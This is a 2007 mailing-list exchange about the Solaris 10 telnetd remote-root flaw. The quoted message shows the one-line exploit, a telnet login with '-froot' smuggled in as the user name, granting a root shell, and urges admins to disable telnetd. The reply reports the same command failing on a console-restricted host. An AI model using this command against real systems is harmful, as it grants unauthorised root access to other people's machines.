[geeks] Solaris 10 Remote-Root Exploit

Dr. Robert Pasken rpasken at eas.slu.edu
Mon Feb 12 14:33:51 CST 2007

On Mon, 2007-02-12 at 07:45 -0600, Jonathan C. Patschke wrote:
> Just saw this on Slashdot:
>
>    http://riosec.com/solaris-telnet-0-day
>
> And verified that it works:
>
>    [jp at cobra:~]$ telnet -l"-froot" lic4
>    Trying 10.10.100.120...
>    Connected to lic4.centtech.com.
>    Escape character is '^]'.
>    Last login: Wed Jan 17 16:53:28 from hal10.centtech.
>    Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
>    You have mail.
>    # Connection closed by foreign host.
>    [jp at cobra:~]$ exit
>    Connection to cobra.centtech.com closed.
>
> If you have any public-facing systems running Solaris's telnetd, you
> should disable it now.  Even turning off remote root logins is
> insufficient, since this seems to bypass PAM.

Didn't work for me and I have telenetd turned on via svcadm

rpasken at thunder> telnet -l"-froot" thunder
Trying 165.134.144.220...
Connected to thunder.
Escape character is '^]'.
Not on system console
Connection to thunder closed by foreign host.
rpasken at thunder>

--
Dr. Robert Pasken <rpasken at eas.slu.edu>
Earth and Atmospheric Sciences Saint Louis University